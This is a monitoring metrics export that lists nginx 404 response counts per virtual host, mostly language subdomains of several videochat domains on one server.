nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fsgpqzh.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fskyuka.videochat.mx"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ftp.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fxtrokm.videochat.mx"} 499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.cafe"} 2540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.date"} 1213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.mx"} 5428 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.show"} 817 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.tv.br"} 2698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.world"} 4585 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gbzxdsi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="get.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ghnoupa.videochat.mx"} 143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="git.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.cafe"} 3266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.date"} 700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.mx"} 7558 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.show"} 524 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.tv.br"} 5685 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.world"} 5019 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gshflesiityi.videochat.mx"} 319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gsvyilo.videochat.mx"} 394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.cafe"} 2168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.date"} 799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.mx"} 7524 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.show"} 365 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.tv.br"} 2312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.world"} 5305 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gvwjvte.videochat.mx"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="harvestreako.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.cafe"} 2407 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.date"} 5025 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.mx"} 8767 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.show"} 1412 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.tv.br"} 2901 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.world"} 13953 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="help.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hfqbkbn.videochat.mx"} 165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hhbjxne.videochat.mx"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.cafe"} 1968 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.date"} 7526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.mx"} 6644 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.show"} 819 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.tv.br"} 2679 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.world"} 5881 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hiqrnsk.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hnipnxh.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.cafe"} 2220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.date"} 7337 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.mx"} 6918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.show"} 3597 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.tv.br"} 3099 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.world"} 5371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hrwqvkn.videochat.mx"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hswxafi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.cafe"} 2541 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.date"} 577 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.mx"} 5886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.show"} 832 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.tv.br"} 2778 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.world"} 2366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="httnl.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="httpbin.org"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="httpgl.videochat.mx"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="htxkwpap.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.cafe"} 4289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.date"} 3890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.mx"} 4777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.show"} 367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.tv.br"} 2868 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.world"} 6439 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="huvcgmi.videochat.mx"} 826 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="huyapaf.videochat.mx"} 449 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hwlvxsv.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hxylzca.videochat.mx"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="i.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="iamhcpap.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ibelgms.videochat.mx"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ibwxcsw.videochat.mx"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="icanhazip.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="iclgzbs.videochat.mx"} 682 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.cafe"} 2402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.date"} 302 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.mx"} 6603 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.show"} 729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.tv.br"} 2750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.world"} 8321 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="idedyca.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ilfpehr.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="image.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="images.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="img.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="internal.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="iothddbkrftg.videochat.mx"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ip-api.com"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ipv4.icanhazip.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.cafe"} 3268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.date"} 1068 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.mx"} 6046 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.show"} 608 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.tv.br"} 3352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.world"} 4614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.cafe"} 2131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.date"} 4569 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.mx"} 6354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.show"} 1719 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.tv.br"} 2490 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.world"} 6207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="iwciapa.videochat.mx"} 389 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="iygjajv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jaiyuba.videochat.mx"} 694 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jargoba.videochat.mx"} 156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jeeaasv.videochat.mx"} 205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jetwmkn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jggpsno.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jhazhhi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jicuu.wsqgdyldaaqgiustqkamqseil.org"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.cafe"} 2479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.date"} 6307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.mx"} 5613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.show"} 662 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.tv.br"} 2270 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.world"} 4909 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jpwioar.videochat.mx"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jrtfyzrhffuzjrval.videochat.mx"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jsowxkk.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="junkfuk.videochat.mx"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jutvtfa.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.cafe"} 2183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.date"} 1438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.mx"} 7354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.show"} 739 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.tv.br"} 4854 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.world"} 2102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jvlrmcs.videochat.mx"} 626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jwmgykm.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.cafe"} 4270 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.date"} 354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.mx"} 7644 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.show"} 655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.tv.br"} 3060 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.world"} 2794 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kbmjvka.videochat.mx"} 533 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kbpnhsi.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kctjjudm.videochat.mx"} 641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="keevjmr.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kgyhobe.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kibcumk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kingboost.net"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kjjlaro.videochat.mx"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.cafe"} 2433 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.date"} 593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.mx"} 7346 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.show"} 496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.tv.br"} 2477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.world"} 4964 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.cafe"} 2564 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.date"} 392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.mx"} 7487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.show"} 279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.tv.br"} 3765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.world"} 4815 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.cafe"} 2802 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.date"} 2073 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.mx"} 5758 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.show"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.tv.br"} 5085 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.world"} 4696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.cafe"} 4122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.date"} 4679 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.mx"} 7589 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.show"} 502 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.tv.br"} 3951 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.world"} 5034 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kxhhvtl.videochat.mx"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kxxgdaz.videochat.mx"} 527 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kxylkid.videochat.mx"} 621 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.cafe"} 2145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.date"} 564 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.mx"} 7122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.show"} 854 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.tv.br"} 2617 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.world"} 4423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="laqpsam.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.cafe"} 2310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.date"} 822 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.mx"} 6408 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.show"} 554 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.tv.br"} 2258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.world"} 4011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lbfxhvi.videochat.mx"} 107 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lcihlsv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lekker-lopeaf.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lelxyfr.videochat.mx"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lemsnsi.videochat.mx"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lffdjlo.videochat.mx"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lggtovozstpt.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lhuqozrhffuzjrval.videochat.mx"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lilvami.videochat.mx"} 771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="linderafashionstylgl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lizfgda.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lkkkwfi.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lkvmlal.videochat.mx"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="llibgam.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.cafe"} 2157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.date"} 626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.mx"} 8132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.show"} 514 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.tv.br"} 2468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.world"} 4292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="localhost"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="login.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.cafe"} 2343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.date"} 5339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.mx"} 7146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.show"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.tv.br"} 2465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.world"} 4654 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.cafe"} 2028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.date"} 5637 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.mx"} 8268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.show"} 586 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.tv.br"} 2656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.world"} 5637 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lvepabs.videochat.mx"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mail.videochat.mx"} 1363 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mcaydel.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mdpmqfi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="media.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="meta.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.cafe"} 3003 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.date"} 1053 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.mx"} 6985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.show"} 359 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.tv.br"} 2643 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.world"} 5472 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.cafe"} 2656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.date"} 652 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.mx"} 6720 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.show"} 448 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.tv.br"} 2388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.world"} 2140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="miqnrka.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mj.game"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mjrwumn.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.cafe"} 2442 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.date"} 4514 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.mx"} 6535 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.show"} 340 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.tv.br"} 2144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.world"} 4373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.cafe"} 2185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.date"} 876 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.mx"} 7690 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.show"} 235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.tv.br"} 1805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.world"} 4985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.cafe"} 2319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.date"} 640 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.mx"} 7113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.show"} 513 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.tv.br"} 2531 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.world"} 3392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mongo.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mpositesmodeca.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.cafe"} 3517 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.date"} 255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.mx"} 6241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.show"} 539 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.tv.br"} 2423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.world"} 4638 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.cafe"} 2671 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.date"} 1016 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.mx"} 7501 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.show"} 466 